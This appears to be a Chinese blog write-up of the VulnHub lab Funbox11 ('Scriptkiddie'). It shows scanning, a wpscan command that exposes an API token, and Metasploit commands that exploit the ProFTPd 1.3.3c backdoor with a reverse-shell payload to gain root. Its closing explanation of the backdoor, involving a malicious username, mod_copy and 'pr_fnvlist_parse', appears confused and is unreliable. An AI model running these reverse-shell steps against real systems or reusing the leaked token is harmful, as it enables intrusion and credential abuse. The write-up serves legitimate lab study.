Vulnhub学习---FUNBOX:SCRIPTKIDDIE

目录

下载链接

靶场搭建

信息收集

端口扫描

hosts重定向

目录扫描

漏洞利用


下载链接

官方链接:VulnHub

靶场下载链接:https://download.vulnhub.com/funbox/Funbox11.ova

靶场搭建

攻击机:

靶机:

信息收集

端口扫描

nmap扫描服务,发现有很多的端口,我们先去看看80端口,访问一下网站

没有东西,我们点点蓝色字体看看里面会不会有东西。

hosts重定向

发现跳转到funbox11,那么好又是重定向,我们对/etc/hosts文件进行编辑。

刷新一下页面

目录扫描

接下来扫描一下目录

有WordPress,那么我们访问一下,并用给wpscan工具扫描一下有没有可以利用的漏洞。

wpscan --url http://funbox11/wp-admin/install.php -e --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ 

发现并没有什么可以利用的漏洞,那么我们只好先跳过这个。我们试试能不能通过其他端口进行渗透。

漏洞利用

我们先搜搜ftp有啥漏洞,没想到还真给我搜到了。

那么我们试试利用这个漏洞,进行渗透

use 0

show payload

set payload payload/cmd/unix/reverse

set rhosts 192.168.4.183

set lhost 192.168.4.50

run

直接就是root权限,完结!!!!!!!!!!!!!!!

ProFTPd-1.3.3c - Backdoor Command Execution 

 ProFTPd-1.3.3c - Backdoor Command Execution POC

这个漏洞的相关原理大家可自行上网上搜索。我就讲讲我对这个漏洞的原理的一些理解,可能有错误希望谅解。

攻击者在FTP客户端中构造一个特殊的FTP命令,其中包含恶意用户名。这个恶意用户名被设计成包含特定的字符串,能够绕过身份验证并利用mod_copy模块的后门。在ProFTPD服务器接收到这个恶意命令时,它会解析命令中的用户名,并触发mod_copy模块中的漏洞代码。这个漏洞代码会识别到恶意命令中的特殊字符串,并执行该命令,从而导致攻击者可以在服务器上执行任意命令。

在解析过程中,pr_fnvlist_parse函数会检查用户名中的特定字符串,并识别出后门代码的存在。一旦识别到后门代码的存在,攻击者构造的恶意命令中的恶意部分将被解析为可执行的命令,并在服务器上执行。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值